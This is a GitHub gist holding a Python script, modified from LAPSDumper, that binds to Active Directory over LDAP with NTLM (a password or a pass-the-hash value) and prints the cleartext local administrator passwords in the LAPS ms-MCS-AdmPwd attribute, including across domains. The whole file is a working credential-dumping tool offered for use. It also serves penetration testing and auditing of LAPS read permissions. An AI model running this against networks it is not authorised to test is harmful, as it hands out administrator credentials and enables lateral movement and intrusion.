@jstnkndy
Created August 6, 2021 15:02
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse
# Command-line interface. Each row is (option strings, help text, required).
# NOTE(review): the bind secret is taken from argv via -p, so it is visible in
# the process list and in shell history on the host where this is run.
_OPTIONS = (
    (('-u', '--username'), 'username for LDAP', True),
    (('-p', '--password'), 'password for LDAP (or LM:NT hash)', True),
    (('-l', '--ldapserver'), 'LDAP server (or domain)', False),
    (('-d', '--domain'), 'Domain', True),
    (('-t', '--target'), "Target Domain", False),
)

parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
for _flags, _help, _required in _OPTIONS:
    parser.add_argument(*_flags, help=_help, required=_required)
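def base_creator(domain):
    """Convert a dotted DNS domain name into an LDAP search base DN.

    ``"corp.example.com"`` becomes ``"DC=corp,DC=example,DC=com"``.

    Empty labels (a trailing dot as in ``"corp.example.com."``, or a doubled
    dot) are skipped so they do not produce an empty ``DC=`` component, which
    is not a usable DN.

    Args:
        domain: DNS-style domain name, labels separated by ``.``.

    Returns:
        The comma-separated ``DC=`` distinguished name.

    Raises:
        ValueError: if *domain* contains no non-empty label. Failing here
            keeps an empty or malformed base from being sent to the server.
    """
    labels = [label for label in domain.split(".") if label]
    if not labels:
        raise ValueError("domain name has no labels: %r" % (domain,))
    # Labels are inserted as-is (no DN escaping); a plain DNS name is expected.
    return ",".join("DC=" + label for label in labels)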
def main():
    """Bind to LDAP with NTLM and print LAPS passwords readable by that account.

    The server contacted is ``--ldapserver`` when given, otherwise the
    ``--domain`` name itself. The search base is derived from ``--target``
    when given, otherwise from ``--domain``. One ``name:password`` line is
    printed per matching computer object.
    """
    args = parser.parse_args()

    # Server() gets no use_ssl/port argument here, so ldap3's defaults apply
    # (plain LDAP); nothing in this script wraps the bind or the returned
    # attribute values in TLS.
    host = args.ldapserver if args.ldapserver else args.domain
    s = Server(host, get_info=ALL)

    # NTLM expects DOMAIN\user; the credential always belongs to --domain,
    # even when a different --target domain is searched.
    ntlm_user = args.domain + "\\" + args.username
    c = Connection(
        s,
        user=ntlm_user,
        password=args.password,
        authentication=NTLM,
        auto_bind=True,
    )

    scope_domain = args.target if args.target else args.domain
    targetdomain = base_creator(scope_domain)

    # ms-MCS-AdmPwd is the legacy LAPS attribute holding the local
    # administrator password in clear text. The (ms-MCS-AdmPwd=*) clause only
    # matches objects on which the bound account can read that attribute, so
    # the output also shows how widely LAPS read access is delegated.
    # The return value of search() is not checked; entries are simply iterated.
    c.search(
        search_base=targetdomain,
        search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))',
        attributes=['ms-MCS-AdmPwd', 'SAMAccountname'],
    )
    for entry in c.entries:
        account = str(entry['sAMAccountName'])
        secret = str(entry['ms-Mcs-AdmPwd'])
        # Passwords go to stdout in clear text; treat any captured output
        # (terminal scrollback, redirected files) as sensitive.
        print(":".join((account, secret)))
    # The connection is never unbound explicitly; it ends with the process.


if __name__ == "__main__":
    main()